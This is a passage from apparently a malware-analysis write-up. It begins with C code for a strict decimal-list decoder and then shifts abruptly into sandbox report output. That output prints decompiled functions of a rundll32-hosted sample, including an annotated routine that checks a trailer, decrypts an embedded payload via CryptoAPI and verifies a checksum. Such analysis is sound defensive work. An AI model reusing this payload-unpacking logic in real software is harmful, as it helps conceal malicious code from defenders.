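        if (*s == '0' && s[1] >= '0' && s[1] <= '9')
            return -1;                          /* leading zero */
        while (*s >= '0' && *s <= '9') {
            v = v * 10 + (unsigned)(*s - '0');
            if (v > 255 || ++digits > 3)
                return -1;                      /* not a byte */
            s++;
        }
        if (digits == 0)
            return -1;                          /* empty field */
        if (out) {
            if ((size_t)count >= cap)
                return -1;                      /* caller's buffer too small */
            out[count] = (unsigned char)v;
        }
        count++;
        if (*s == '\0')
            return count;
        if (*s != ',')
            return -1;                          /* stray character */
        s++;
    }
}

/* Encodes in[0..n) and compares text and reported length with expected. */
int encodes_to(const unsigned char *in, size_t n, const char *expected)
{
    char *s;
    size_t len;
    int ok;
    if (encode_bytes_as_decimal_list(in, n, &s, &len) != 0)
        return 0;
    ok = strcmp(s, expected) == 0 && len == strlen(expected);
    free(s);
    return ok;
}

/* Encode, decode, and check that the original bytes come back unchanged. */
int roundtrip_ok(const unsigned char *in, size_t n)
{
    unsigned char back[64];
    char *s;
    size_t len;
    long m;
    int ok;
    if (n > sizeof back)
        return 0;
    if (encode_bytes_as_decimal_list(in, n, &s, &len) != 0)
        return 0;
    m = decode_decimal_list(s, back, sizeof back);
    ok = m == (long)n && memcmp(back, in, n) == 0 && strlen(s) == len;
    free(s);
    return ok;
}

int main(void)
{
    /* Constructed demonstration input, not data taken from the sample. */
    const unsigned char sample[] = { 0, 5, 50, 100, 105, 255, 9, 99 };
    char *s;
    size_t len;
    if (encode_bytes_as_decimal_list(sample, sizeof sample, &s, &len) != 0)
        return 1;
    printf("%s (len %zu)\n", s, len);
    free(s);
    return 0;
}
```

The decoder is stricter than a generic `strtoul` loop on purpose: rejecting leading zeros, empty fields and values above 255 means any text that parses is text this encoder could have produced, which is the property you want when writing a parser for traffic or artifacts that use this form.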

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049F2172
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: bb757515908c18f6dd9c4388e1f564a4ed8970f08d60122c1e889c8c99350308
                                            • Instruction ID: 189a4060e1912ac49cf113ce91710855a813237c4bde227eec465ed85a94d28b
                                            • Opcode Fuzzy Hash: bb757515908c18f6dd9c4388e1f564a4ed8970f08d60122c1e889c8c99350308
                                            • Instruction Fuzzy Hash: F9110631385345AFEB068F69DC91BE97BA9DB53318F1440DAE6409F292C277A50BC724
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleA.KERNEL32(-00000002,?,?,00000000,?,?,05801765,00000000,00000000), ref: 05803049
                                              • Part of subcall function 05815D9D: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05829420), ref: 05815DB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HandleInformationModuleProcessQuery
                                            • String ID:
                                            • API String ID: 2776635927-0
                                            • Opcode ID: 2a3444e0ba4990315cf91482e998979dce4663a2fa6485cb763dac505ae94ea3
                                            • Instruction ID: 80a636466f140874d099e5b998818a372b822571e8941d2e40ca50e922e5f7a9
                                            • Opcode Fuzzy Hash: 2a3444e0ba4990315cf91482e998979dce4663a2fa6485cb763dac505ae94ea3
                                            • Instruction Fuzzy Hash: E8213B71701609AFEF60CF99DC84EAB77A9FF44290714582AED45CB290DB71ED408B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F5347(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                            				intOrPtr _v12;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				signed int _v60;
                                            				char _v68;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t14;
                                            				signed int* _t16;
                                            				signed int _t25;
                                            				signed int _t26;
                                            				signed int* _t28;
                                            				signed int _t30;
                                            
                                            				_t28 = __ecx;
                                            				_t14 =  *0x49fa368; // 0x4f79618
                                            				_v12 = _t14;
                                            				_t16 = _a12;
                                            				_t30 = 8;
                                            				if(_t16 != 0) {
                                            					 *_t16 =  *_t16 & 0x00000000;
                                            				}
                                            				do {
                                            					_t31 =  &_v68;
                                            					if(E049F24BC( &_v68) == 0) {
                                            						goto L16;
                                            					}
                                            					_t30 = E049F4BD6(_t31, _a4, _v12);
                                            					if(_t30 == 0) {
                                            						_t25 = E049F595A(_t31, 0x102, _t28, _t30); // executed
                                            						_t30 = _t25;
                                            						if(_t30 != 0) {
                                            							if(_t30 == 0x102) {
                                            								E049FA000 = E049FA000 + 0xea60;
                                            							}
                                            						} else {
                                            							if(_v24 != 0xc8) {
                                            								_t30 = 0xe8;
                                            							} else {
                                            								_t26 = _v20;
                                            								if(_t26 == 0) {
                                            									_t30 = 0x10d2;
                                            								} else {
                                            									_t28 = _a8;
                                            									if(_t28 != 0) {
                                            										_v60 = _v60 & _t30;
                                            										 *_t28 = _v60;
                                            										_t28 = _a12;
                                            										if(_t28 != 0) {
                                            											 *_t28 = _t26;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					E049F15B9( &_v68, 0x102, _t28, _t30);
                                            					L16:
                                            				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x49fa30c, 0) == 0x102);
                                            				return _t30;
                                            			}

                                            APIs
                                            • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76CC81D0), ref: 049F53F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ObjectSingleWait
                                            • String ID:
                                            • API String ID: 24740636-0
                                            • Opcode ID: b2f20c2d10b20c6062c334c646f716d6b1d46b1fac1aaea27999a50aa9833caa
                                            • Instruction ID: 9ecb9fc4d367a0791e7d481f2855cec1df362cdeb0df3f2e8fac88978c512f19
                                            • Opcode Fuzzy Hash: b2f20c2d10b20c6062c334c646f716d6b1d46b1fac1aaea27999a50aa9833caa
                                            • Instruction Fuzzy Hash: E3216D32700205EBDB119E59DC80B6E77F9EB80365F568439EA0597241D7F4FC46CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0580FE75
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 6e954402e648b5a5f723f092b52d0f0ef360aaec43ebcf8ff48a7ddaaf2087fe
                                            • Instruction ID: c4a8e74af0fd59a1cbd952ade538c94196b7aaad3686040d233a4690dee796ec
                                            • Opcode Fuzzy Hash: 6e954402e648b5a5f723f092b52d0f0ef360aaec43ebcf8ff48a7ddaaf2087fe
                                            • Instruction Fuzzy Hash: 64111B3220420AAFDF529FA9DC419DA7FA9FF08270B059125FE29D61A1CB31DC21DF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 34%
                                            			E049F6D05(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                            				intOrPtr _v12;
                                            				void* _v18;
                                            				char _v20;
                                            				intOrPtr _t15;
                                            				void* _t17;
                                            				intOrPtr _t19;
                                            				void* _t23;
                                            
                                            				_v20 = 0;
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosw");
                                            				_t15 =  *0x49fa348; // 0x57d5a8
                                            				_t4 = _t15 + 0x49fb39c; // 0x4f78944
                                            				_t20 = _t4;
                                            				_t6 = _t15 + 0x49fb124; // 0x650047
                                            				_t17 = E049F69D2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                            				if(_t17 < 0) {
                                            					_t23 = _t17;
                                            				} else {
                                            					_t23 = 8;
                                            					if(_v20 != _t23) {
                                            						_t23 = 1;
                                            					} else {
                                            						_t19 = E049F1109(_t20, _v12);
                                            						if(_t19 != 0) {
                                            							 *_a16 = _t19;
                                            							_t23 = 0;
                                            						}
                                            						__imp__#6(_v12);
                                            					}
                                            				}
                                            				return _t23;
                                            			}

                                            APIs
                                              • Part of subcall function 049F69D2: SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                              • Part of subcall function 049F1109: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,049F2B23,004F0053,00000000,?), ref: 049F1112
                                              • Part of subcall function 049F1109: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,049F2B23,004F0053,00000000,?), ref: 049F113C
                                              • Part of subcall function 049F1109: memset.NTDLL ref: 049F1150
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F6D68
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeString$lstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 397948122-0
                                            • Opcode ID: ccc0434ba5a9ee644e54125c945d2b0f51355bb5fbf47c006ef3bf85ceb6d776
                                            • Instruction ID: 97b0a9e1667832158de81098e2dcf853af9fc6ecb41aacf9c11fbfe026dd4f65
                                            • Opcode Fuzzy Hash: ccc0434ba5a9ee644e54125c945d2b0f51355bb5fbf47c006ef3bf85ceb6d776
                                            • Instruction Fuzzy Hash: 08015A72600629BFDB119FA8CC04EAABBB9EB44654F004435EA15E6060E7B0BD62C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E049F267F(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                            				char _v8;
                                            				void* _t14;
                                            				intOrPtr _t17;
                                            				void* _t20;
                                            				void* _t26;
                                            
                                            				_push(__ecx);
                                            				if(_a4 == 0 || __eax == 0) {
                                            					_t26 = 0x57;
                                            				} else {
                                            					_t14 = E049F215A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                            					_t26 = _t14;
                                            					if(_t26 == 0) {
                                            						_t17 =  *0x49fa348; // 0x57d5a8
                                            						_t9 = _t17 + 0x49fba38; // 0x444f4340
                                            						_t20 = E049F250D( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                            						_t26 = _t20;
                                            						RtlFreeHeap( *0x49fa2d8, 0, _a4); // executed
                                            					}
                                            				}
                                            				return _t26;
                                            			}

                                            APIs
                                              • Part of subcall function 049F215A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049F2172
                                              • Part of subcall function 049F250D: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 049F2541
                                              • Part of subcall function 049F250D: StrStrA.SHLWAPI(00000000,?), ref: 049F254E
                                              • Part of subcall function 049F250D: RtlAllocateHeap.NTDLL(00000000,?), ref: 049F256D
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,049F61F6), ref: 049F26D5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$Allocate$Freelstrlen
                                            • String ID:
                                            • API String ID: 2220322926-0
                                            • Opcode ID: 02e93b0ae6e8d6c105936b734cf46f5df868feccc2ab76a41a67e29490321a17
                                            • Instruction ID: 0619ed9b06d0e2db23fcfe9af69740c544f25a72d86930c06bca5adeb4b886f3
                                            • Opcode Fuzzy Hash: 02e93b0ae6e8d6c105936b734cf46f5df868feccc2ab76a41a67e29490321a17
                                            • Instruction Fuzzy Hash: 9F016D76200608BFDB11DF84DC00F9A7BADEB44344F104076FA0996160E772FA85DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 05822A98
                                              • Part of subcall function 05822BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,05800000), ref: 05822C64
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                            • String ID:
                                            • API String ID: 123106877-0
                                            • Opcode ID: 67d40e0486b29b397827ec3d2e12de9fa9115d61cb44dfa35ef0b12a12d1aae4
                                            • Instruction ID: a39a42317afb7d8cd267408d9c32b5585f7f6db1c4d97dd5a0af2b7365980728
                                            • Opcode Fuzzy Hash: 67d40e0486b29b397827ec3d2e12de9fa9115d61cb44dfa35ef0b12a12d1aae4
                                            • Instruction Fuzzy Hash: 14A001BA7A9226BD3218EA566D8BD3A0A9DE4C0E653A0855ABC07D8940A8942CC61036
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 05822A98
                                              • Part of subcall function 05822BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,05800000), ref: 05822C64
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                            • String ID:
                                            • API String ID: 123106877-0
                                            • Opcode ID: 758f874b59c0bad8d9101d9263a877a960591104bed8f47c12763a4bc6278d6e
                                            • Instruction ID: 4a4e3b6869d3fa0687062888b3c4e6a69c6cbe1c1932a737d47b7f254ce824ed
                                            • Opcode Fuzzy Hash: 758f874b59c0bad8d9101d9263a877a960591104bed8f47c12763a4bc6278d6e
                                            • Instruction Fuzzy Hash: 95A002A939D127BD311465565D47C36099DE4C4D553604559AC03C854064941CC51031
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F4C73(void* _a4) {
                                            				char _t2;
                                            
                                            				_t2 = RtlFreeHeap( *0x49fa2d8, 0, _a4); // executed
                                            				return _t2;
                                            			}

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: ed5ee48f03f005f41b37c0e1441b90a7bb4bdb4737ee630c89f782b4c95c9cc1
                                            • Instruction ID: a2f7a52f2d86c144fd650031df3d060cc2ec6d59b39f38c75c83b3c71240f54d
                                            • Opcode Fuzzy Hash: ed5ee48f03f005f41b37c0e1441b90a7bb4bdb4737ee630c89f782b4c95c9cc1
                                            • Instruction Fuzzy Hash: CBB012B1308200ABCB114B40DE04F057E21E790700F004030F30800070C2361C60FB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F4DF6(long _a4) {
                                            				void* _t2;
                                            
                                            				_t2 = RtlAllocateHeap( *0x49fa2d8, 0, _a4); // executed
                                            				return _t2;
                                            			}

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 026ac37676668c8dbaa4abd90297f0535277799afaf53038a73293e94d88b304
                                            • Instruction ID: b75d6a3d35cadb005911b82bcb8723ff9614d2c0d7e0febb184cf11bf2f9512d
                                            • Opcode Fuzzy Hash: 026ac37676668c8dbaa4abd90297f0535277799afaf53038a73293e94d88b304
                                            • Instruction Fuzzy Hash: 40B01271208200ABCA014B40DD08F457F21F750700F004030F60840070C2371C60FB04
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: e934ea8da9c7e3182fb2d31f46e38c14b92d027f2b435a89205b490549600bec
                                            • Instruction ID: e993c3c591f9b6f77e6e0e4b037975da939e988abb8b5dbe14e84b12869e6ab5
                                            • Opcode Fuzzy Hash: e934ea8da9c7e3182fb2d31f46e38c14b92d027f2b435a89205b490549600bec
                                            • Instruction Fuzzy Hash: 48B01271110100BBDE214B10EE06F457E21A760700F00C011FB09000708A3124A0EB1A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F17E5(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                            				void* _v8;
                                            				int _v12;
                                            				char _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				char _v32;
                                            				char _v144;
                                            				int _v148;
                                            				intOrPtr _v152;
                                            				intOrPtr _v156;
                                            				intOrPtr _v160;
                                            				char _v164;
                                            				void* _t37;
                                            				void* _t42;
                                            				void* _t51;
                                            				int _t53;
                                            				void* _t60;
                                            				void* _t63;
                                            				void* _t64;
                                            
                                            				_t53 = 0;
                                            				_t60 = __ecx;
                                            				_v16 = 0;
                                            				_v12 = 0;
                                            				_v8 = 0;
                                             				if(__ecx <= 0x80 ||  *__eax != 0x400) { // input must be longer than its 0x80-byte trailer and carry the 0x400 marker
                                            					L21:
                                            					return _t53;
                                            				} else {
                                            					_t58 =  &_v164;
                                             				_t37 = E049F2F5B(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80); // parses the trailing 0x80 bytes into the structure at &_v164 (16-byte check value in _v164.._v152, payload length in _v148)
                                            					if(_t37 != 0) {
                                            						goto L21;
                                            					}
                                            					_t61 = _t60 - 0x80;
                                            					if(_v148 > _t60 - 0x80) {
                                            						goto L21;
                                            					}
                                             					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) { // 16 zero positions after _v144: payload is stored in clear and is copied as-is; any non-zero value: payload is decrypted via E049F3072 below
                                            						_t37 = _t37 + 1;
                                            						if(_t37 < 0x10) {
                                            							continue;
                                            						}
                                            						_t53 = _v148;
                                            						_t51 = E049F4DF6(_t53);
                                            						_v8 = _t51;
                                            						_t73 = _t51;
                                            						if(_t51 != 0) {
                                            							_t53 = 0;
                                            							L18:
                                            							if(_t53 != 0) {
                                            								goto L21;
                                            							}
                                            							L19:
                                            							if(_v8 != 0) {
                                            								E049F4C73(_v8);
                                            							}
                                            							goto L21;
                                            						}
                                             						memcpy(_t51, _a4, _t53); // plain copy of _v148 bytes into the fresh heap buffer
                                            						L8:
                                            						_t63 = _v8;
                                            						E049F679A(_t58, _t73, _t63, _t53,  &_v32);
                                             						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) { // E049F679A recomputes the 16-byte check value over the output; a mismatch with the trailer's value discards the buffer
                                            							L15:
                                            							_t53 = 0;
                                            							goto L19;
                                            						} else {
                                            							 *_a8 = _t63;
                                            							goto L18;
                                            						}
                                            					}
                                            					_t58 =  &_v144;
                                             					_t42 = E049F3072(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed; CryptoAPI decrypt (CryptAcquireContextW/CryptImportKey/CryptSetKeyParam, see the APIs listed for E049F3072 under E049F723B); length rounded down to a 16-byte multiple
                                            					__eflags = _t42;
                                            					if(_t42 != 0) {
                                            						_t53 = _v12;
                                            						goto L18;
                                            					}
                                            					_t53 = _v148;
                                            					__eflags = _v12 - _t53;
                                            					if(__eflags >= 0) {
                                            						goto L8;
                                            					}
                                            					goto L15;
                                            				}
                                             			}

                                             Instruction addresses: 0x049f17f0 to 0x049f1905

                                            APIs
                                            • memcpy.NTDLL(00000000,?,?,?,?,049F58B7,00000001,?,?,049F58B7), ref: 049F186C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0
                                            • Opcode ID: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                            • Instruction ID: 1365a46a0291c236a41d3416aca28dcbc3bc9089256385470b21286ed8754daf
                                            • Opcode Fuzzy Hash: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                            • Instruction Fuzzy Hash: 4E313D71E00219EFEF25DED4CD81AEEB779BB44304F5044B9E615A7140D730AE45DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.419649464.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2cc0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                            • Instruction ID: af8e87425a5a898070f28a653b28f0e1375b238e3f184be05e206df4d007483a
                                            • Opcode Fuzzy Hash: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                            • Instruction Fuzzy Hash: 884126B09012068FDB04CF65C5547AEBBF0FF48304F24856DD858AB351D3BA9946CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,05817C87,00000000,?,05817C87,00000000,00000001,00000000,76C84D40,?,?,?,05817C87,00000000), ref: 0581A148
                                              • Part of subcall function 0581C051: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,05813796,00000000,00000001,-00000007,?,00000000), ref: 0581C074
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                            • String ID:
                                            • API String ID: 1301464996-0
                                            • Opcode ID: 961fdb1b30cc8de93ee69062f601e45288d6b53b311e7d714adf166abc0deeec
                                            • Instruction ID: 9fa821c6b12e4cf6281cb8a2de8b4c3028dfc5c2bcd67fde96ddd48a62c5b529
                                            • Opcode Fuzzy Hash: 961fdb1b30cc8de93ee69062f601e45288d6b53b311e7d714adf166abc0deeec
                                            • Instruction Fuzzy Hash: 83119475611205EFDB28EE59DC85EBA7BADEB44620F504025FD03DB290DB70ED808B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0580603A
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810064
                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,00000020,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810073
                                              • Part of subcall function 05805DA0: CloseHandle.KERNEL32(?), ref: 05805DC6
                                              • Part of subcall function 05805DA0: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05805DD2
                                              • Part of subcall function 05805DA0: GetModuleHandleA.KERNEL32(?,05D7978E), ref: 05805DF2
                                              • Part of subcall function 05805DA0: GetProcAddress.KERNEL32(00000000), ref: 05805DF9
